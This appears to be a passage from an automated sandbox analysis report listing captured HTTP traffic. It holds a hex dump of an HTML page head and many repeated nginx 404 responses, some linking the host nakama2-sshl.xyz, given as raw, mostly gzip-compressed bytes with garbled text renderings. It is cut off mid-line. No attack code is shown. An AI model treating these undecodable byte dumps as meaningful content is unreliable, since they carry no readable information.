6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:55:45 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:56:04 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:56:07 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:56:09 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 23 Sep 2024 12:56:12 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Mon, 23 Sep 2024 12:56:19 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Mon, 23 Sep 2024 12:56:22 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C 